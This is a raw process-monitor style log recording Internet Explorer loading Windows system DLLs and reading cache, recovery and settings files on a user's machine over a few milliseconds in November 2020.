11/3/2020 - 11:45:43.887Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat
11/3/2020 - 11:45:43.887Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\ws2_32.dll
11/3/2020 - 11:45:43.887Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\ws2_32.dll
11/3/2020 - 11:45:43.887Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\nsi.dll
11/3/2020 - 11:45:43.887Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\nsi.dll
11/3/2020 - 11:45:43.887Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\winhttp.dll
11/3/2020 - 11:45:43.887Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\winhttp.dll
11/3/2020 - 11:45:43.887Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\webio.dll
11/3/2020 - 11:45:43.887Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\webio.dll
11/3/2020 - 11:45:43.887Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\api-ms-win-downlevel-shlwapi-l2-1-0.dll
11/3/2020 - 11:45:43.887Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\api-ms-win-downlevel-shlwapi-l2-1-0.dllapi-ms-win-downlevel-shlwapi-l2-1-0.dll
11/3/2020 - 11:45:43.887Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\mswsock.dll
11/3/2020 - 11:45:43.887Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\mswsock.dll
11/3/2020 - 11:45:43.887Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\wship6.dll
11/3/2020 - 11:45:43.887Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\wship6.dll
11/3/2020 - 11:45:43.887Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\IPHLPAPI.DLL
11/3/2020 - 11:45:43.887Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\IPHLPAPI.DLL
11/3/2020 - 11:45:43.887Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\winnsi.dll
11/3/2020 - 11:45:43.887Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\winnsi.dll
11/3/2020 - 11:45:43.887Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\clbcatq.dll
11/3/2020 - 11:45:43.887Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\clbcatq.dll
11/3/2020 - 11:45:43.887Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\netprofm.dll
11/3/2020 - 11:45:43.887Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\netprofm.dll
11/3/2020 - 11:45:43.887Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\nlaapi.dll
11/3/2020 - 11:45:43.887Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\nlaapi.dll
11/3/2020 - 11:45:43.887Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\cryptsp.dll
11/3/2020 - 11:45:43.887Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\cryptsp.dll
11/3/2020 - 11:45:43.887Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\rsaenh.dll
11/3/2020 - 11:45:43.887Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\rsaenh.dll
11/3/2020 - 11:45:43.887Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\RpcRtRemote.dll
11/3/2020 - 11:45:43.887Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\RpcRtRemote.dllRpcRtRemote.dll
11/3/2020 - 11:45:43.887Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\npmproxy.dll
11/3/2020 - 11:45:43.887Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\npmproxy.dll
11/3/2020 - 11:45:43.887Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\WSHTCPIP.DLL
11/3/2020 - 11:45:43.887Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\WSHTCPIP.DLL
11/3/2020 - 11:45:43.887Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\dnsapi.dll
11/3/2020 - 11:45:43.887Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\dnsapi.dll
11/3/2020 - 11:45:43.887Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\rasadhlp.dll
11/3/2020 - 11:45:43.887Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\rasadhlp.dll
11/3/2020 - 11:45:43.887Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Program Files\Internet Explorer\ieproxy.dll
11/3/2020 - 11:45:43.887Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Program Files\Internet Explorer\ieproxy.dll
11/3/2020 - 11:45:43.903Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\FWPUCLNT.DLL
11/3/2020 - 11:45:43.903Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\FWPUCLNT.DLL
11/3/2020 - 11:45:43.903Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat
11/3/2020 - 11:45:43.903Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat
11/3/2020 - 11:45:43.903Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\netapi32.dll
11/3/2020 - 11:45:43.903Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\netapi32.dll
11/3/2020 - 11:45:43.903Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\netutils.dll
11/3/2020 - 11:45:43.903Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\netutils.dll
11/3/2020 - 11:45:43.903Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\srvcli.dll
11/3/2020 - 11:45:43.903Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\srvcli.dll
11/3/2020 - 11:45:43.903Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\wkscli.dll
11/3/2020 - 11:45:43.903Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\wkscli.dll
11/3/2020 - 11:45:43.903Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\crypt32.dll
11/3/2020 - 11:45:43.903Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\crypt32.dll
11/3/2020 - 11:45:43.903Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\msasn1.dll
11/3/2020 - 11:45:43.903Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\msasn1.dll
11/3/2020 - 11:45:43.903Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\ieui.dll
11/3/2020 - 11:45:43.903Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\ieui.dll
11/3/2020 - 11:45:43.903Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RECOVERYSTORE.{6C9E6232-4F1A-11E8-8B8A-525400842A13}.DAT
11/3/2020 - 11:45:43.903Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\~DF31E8A27AA33A1DCA.TMP
11/3/2020 - 11:45:43.903Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\Fonts\StaticCache.dat
11/3/2020 - 11:45:43.903Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\Fonts\StaticCache.datStaticCache.dat
11/3/2020 - 11:45:43.903Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\apphelp.dll
11/3/2020 - 11:45:43.903Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\apphelp.dll
11/3/2020 - 11:45:43.903Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\WindowsCodecs.dll
11/3/2020 - 11:45:43.903Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\WindowsCodecs.dllWindowsCodecs.dll
11/3/2020 - 11:45:43.903Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\oleacc.dll
11/3/2020 - 11:45:43.903Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\oleacc.dll
11/3/2020 - 11:45:43.903Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\oleaccrc.dll
11/3/2020 - 11:45:43.903Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\oleaccrc.dll
11/3/2020 - 11:45:43.903Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\ExplorerFrame.dll
11/3/2020 - 11:45:43.903Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\ExplorerFrame.dllExplorerFrame.dll
11/3/2020 - 11:45:43.903Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\duser.dll
11/3/2020 - 11:45:43.903Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\duser.dll
11/3/2020 - 11:45:43.903Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\dui70.dll
11/3/2020 - 11:45:43.903Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\dui70.dll
11/3/2020 - 11:45:43.903Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\msimg32.dll
11/3/2020 - 11:45:43.903Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\msimg32.dll
11/3/2020 - 11:45:43.903Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{6C9E6234-4F1A-11E8-8B8A-525400842A13}.DAT
11/3/2020 - 11:45:43.903Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\~DF96115008492A9D98.TMP
11/3/2020 - 11:45:43.903Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer\iexplore.exe
11/3/2020 - 11:45:43.903Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer\iexplore.exe
11/3/2020 - 11:45:43.903Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\propsys.dll
11/3/2020 - 11:45:43.903Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\propsys.dll
11/3/2020 - 11:45:43.903Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\ProgramData\Microsoft\Windows\Caches\cversions.2.db
11/3/2020 - 11:45:43.903Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\ProgramData\Microsoft\Windows\Caches\cversions.2.dbcversions.2.db
11/3/2020 - 11:45:43.903Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\ProgramData\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000011.db
11/3/2020 - 11:45:43.903Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\ProgramData\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000011.db{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000011.db
11/3/2020 - 11:45:43.903Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\ProgramData\Microsoft\Windows\Caches\{D26FB7DB-64FE-4194-9875-380C6181B1A4}.2.ver0x0000000000000001.db
11/3/2020 - 11:45:43.903Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\ProgramData\Microsoft\Windows\Caches\{D26FB7DB-64FE-4194-9875-380C6181B1A4}.2.ver0x0000000000000001.db{D26FB7DB-64FE-4194-9875-380C6181B1A4}.2.ver0x0000000000000001.db
11/3/2020 - 11:45:43.903Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\mssprxy.dll
11/3/2020 - 11:45:43.903Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\mssprxy.dll
11/3/2020 - 11:45:43.903Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\dhcpcsvc6.dll
11/3/2020 - 11:45:43.903Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\dhcpcsvc6.dlldhcpcsvc6.dll
11/3/2020 - 11:45:43.903Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\dhcpcsvc.dll
11/3/2020 - 11:45:43.903Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\dhcpcsvc.dll
11/3/2020 - 11:45:43.903Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\mlang.dll
11/3/2020 - 11:45:43.903Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\mlang.dll
11/3/2020 - 11:45:43.903Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\Favorites\desktop.ini
11/3/2020 - 11:45:43.903Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\Favorites\desktop.ini
11/3/2020 - 11:45:43.903Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\Desktop\desktop.ini
11/3/2020 - 11:45:43.903Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\Desktop\desktop.ini
11/3/2020 - 11:45:43.903Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\ProgramData\Microsoft\Windows\Caches\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db
11/3/2020 - 11:45:43.903Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\ProgramData\Microsoft\Windows\Caches\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db
11/3/2020 - 11:45:43.903Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\imagestore\iwbzmlt\imagestore.dat
11/3/2020 - 11:45:43.903Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\imagestore\iwbzmlt\imagestore.datimagestore.dat
11/3/2020 - 11:45:43.903Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\setupapi.dll
11/3/2020 - 11:45:43.903Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\setupapi.dll
11/3/2020 - 11:45:43.903Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\cfgmgr32.dll
11/3/2020 - 11:45:43.903Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\cfgmgr32.dll
11/3/2020 - 11:45:43.903Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\devobj.dll
11/3/2020 - 11:45:43.903Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\devobj.dll
11/3/2020 - 11:45:43.903Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\api-ms-win-downlevel-shell32-l1-1-0.dllapi-ms-win-downlevel-shell32-l1-1-0.dll
11/3/2020 - 11:45:43.903Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Program Files\Internet Explorer\IEShims.dll
11/3/2020 - 11:45:43.903Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\comdlg32.dll
11/3/2020 - 11:45:43.903Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\api-ms-win-downlevel-shlwapi-l2-1-0.dllapi-ms-win-downlevel-shlwapi-l2-1-0.dll
11/3/2020 - 11:45:43.903Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\netprofm.dll
11/3/2020 - 11:45:43.903Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\nlaapi.dll
11/3/2020 - 11:45:43.903Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\npmproxy.dll
11/3/2020 - 11:45:43.903Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\WSHTCPIP.DLL
11/3/2020 - 11:45:43.903Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\dnsapi.dll
11/3/2020 - 11:45:43.903Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\rasadhlp.dll
11/3/2020 - 11:45:43.903Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Program Files\Internet Explorer\ieproxy.dll
11/3/2020 - 11:45:43.903Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\FWPUCLNT.DLL
11/3/2020 - 11:45:43.903Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\apphelp.dll
11/3/2020 - 11:45:43.903Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\WindowsCodecs.dllWindowsCodecs.dll
11/3/2020 - 11:45:43.903Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\oleacc.dll
11/3/2020 - 11:45:43.903Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\duser.dll
11/3/2020 - 11:45:43.903Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\dui70.dll
11/3/2020 - 11:45:43.903Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\msimg32.dll
11/3/2020 - 11:45:43.903Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\dhcpcsvc6.dlldhcpcsvc6.dll
11/3/2020 - 11:45:43.903Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\dhcpcsvc.dll
11/3/2020 - 11:45:43.903Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\mlang.dll
11/3/2020 - 11:45:43.903Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\locale.nls
11/3/2020 - 11:45:43.903Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\Globalization\Sorting\SortDefault.nlsSortDefault.nls
11/3/2020 - 11:45:43.903Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\WindowsShell.ManifestWindowsShell.Manifest
11/3/2020 - 11:45:43.918Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_a4d981ff711297b6\comctl32.dll
11/3/2020 - 11:45:43.918Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\rpcss.dll
11/3/2020 - 11:45:43.918Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat
11/3/2020 - 11:45:43.918Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat
11/3/2020 - 11:45:43.918Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\Fonts\StaticCache.datStaticCache.dat
11/3/2020 - 11:45:43.918Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\oleaccrc.dll
11/3/2020 - 11:45:43.918Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\ProgramData\Microsoft\Windows\Caches\cversions.2.dbcversions.2.db
11/3/2020 - 11:45:43.918Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\ProgramData\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000011.db{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000011.db
11/3/2020 - 11:45:43.918Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\ProgramData\Microsoft\Windows\Caches\{D26FB7DB-64FE-4194-9875-380C6181B1A4}.2.ver0x0000000000000001.db{D26FB7DB-64FE-4194-9875-380C6181B1A4}.2.ver0x0000000000000001.db
11/3/2020 - 11:45:43.918Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\Favorites\desktop.ini
11/3/2020 - 11:45:43.918Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\Desktop\desktop.ini
11/3/2020 - 11:45:43.918Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\ProgramData\Microsoft\Windows\Caches\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db
11/3/2020 - 11:45:43.918Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\imagestore\iwbzmlt\imagestore.datimagestore.dat
11/3/2020 - 11:45:43.918Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\ntdll.dll
11/3/2020 - 11:45:43.918Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\kernel32.dll
11/3/2020 - 11:45:43.918Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\apisetschema.dllapisetschema.dll
11/3/2020 - 11:45:43.918Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\KernelBase.dllKernelBase.dll
11/3/2020 - 11:45:43.918Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Program Files\Internet Explorer\iexplore.exe
11/3/2020 - 11:45:43.918Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\user32.dll
11/3/2020 - 11:45:43.918Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\gdi32.dll
11/3/2020 - 11:45:43.918Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\lpk.dll
11/3/2020 - 11:45:43.918Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\usp10.dll
11/3/2020 - 11:45:43.918Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\msvcrt.dll
11/3/2020 - 11:45:43.918Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\api-ms-win-downlevel-advapi32-l1-1-0.dllapi-ms-win-downlevel-advapi32-l1-1-0.dll
11/3/2020 - 11:45:43.918Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\advapi32.dll
11/3/2020 - 11:45:43.918Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\sechost.dll
11/3/2020 - 11:45:43.918Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\rpcrt4.dll
11/3/2020 - 11:45:43.918Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\shell32.dll
11/3/2020 - 11:45:43.918Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\shlwapi.dll
11/3/2020 - 11:45:43.918Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\iertutil.dll
11/3/2020 - 11:45:43.918Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\api-ms-win-downlevel-version-l1-1-0.dllapi-ms-win-downlevel-version-l1-1-0.dll
11/3/2020 - 11:45:43.918Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\version.dll
11/3/2020 - 11:45:43.918Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\api-ms-win-downlevel-user32-l1-1-0.dllapi-ms-win-downlevel-user32-l1-1-0.dll
11/3/2020 - 11:45:43.918Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\api-ms-win-downlevel-normaliz-l1-1-0.dllapi-ms-win-downlevel-normaliz-l1-1-0.dll
11/3/2020 - 11:45:43.918Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\normaliz.dll
11/3/2020 - 11:45:43.918Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\api-ms-win-downlevel-shlwapi-l1-1-0.dllapi-ms-win-downlevel-shlwapi-l1-1-0.dll
11/3/2020 - 11:45:43.918Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\imm32.dll
11/3/2020 - 11:45:43.918Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\msctf.dll
11/3/2020 - 11:45:43.918Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\cryptbase.dllcryptbase.dll
11/3/2020 - 11:45:43.918Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\ieframe.dll
11/3/2020 - 11:45:43.918Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\ole32.dll
11/3/2020 - 11:45:43.918Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\oleaut32.dll
11/3/2020 - 11:45:43.918Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757\comctl32.dll
11/3/2020 - 11:45:43.918Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\uxtheme.dll
11/3/2020 - 11:45:43.918Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\urlmon.dll
11/3/2020 - 11:45:43.918Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\api-ms-win-downlevel-ole32-l1-1-0.dllapi-ms-win-downlevel-ole32-l1-1-0.dll
11/3/2020 - 11:45:43.918Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\wininet.dll
11/3/2020 - 11:45:43.918Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\userenv.dll
11/3/2020 - 11:45:43.918Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\profapi.dll
11/3/2020 - 11:45:43.918Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\dwmapi.dll
11/3/2020 - 11:45:43.918Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Program Files\Internet Explorer\sqmapi.dll
11/3/2020 - 11:45:43.918Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\secur32.dll
11/3/2020 - 11:45:43.918Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\sspicli.dll
11/3/2020 - 11:45:43.918Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\api-ms-win-downlevel-advapi32-l2-1-0.dllapi-ms-win-downlevel-advapi32-l2-1-0.dll
11/3/2020 - 11:45:43.918Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\ws2_32.dll
11/3/2020 - 11:45:43.918Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\nsi.dll
11/3/2020 - 11:45:43.918Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\winhttp.dll
11/3/2020 - 11:45:43.918Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\webio.dll
11/3/2020 - 11:45:43.918Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\mswsock.dll
11/3/2020 - 11:45:43.918Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\wship6.dll
11/3/2020 - 11:45:43.918Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\IPHLPAPI.DLL
11/3/2020 - 11:45:43.918Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\winnsi.dll
11/3/2020 - 11:45:43.918Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\clbcatq.dll
11/3/2020 - 11:45:43.918Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\cryptsp.dll
11/3/2020 - 11:45:43.918Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\rsaenh.dll
11/3/2020 - 11:45:43.918Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\RpcRtRemote.dllRpcRtRemote.dll
11/3/2020 - 11:45:43.918Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\netapi32.dll
11/3/2020 - 11:45:43.918Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\netutils.dll
11/3/2020 - 11:45:43.918Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\srvcli.dll
11/3/2020 - 11:45:43.918Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\wkscli.dll
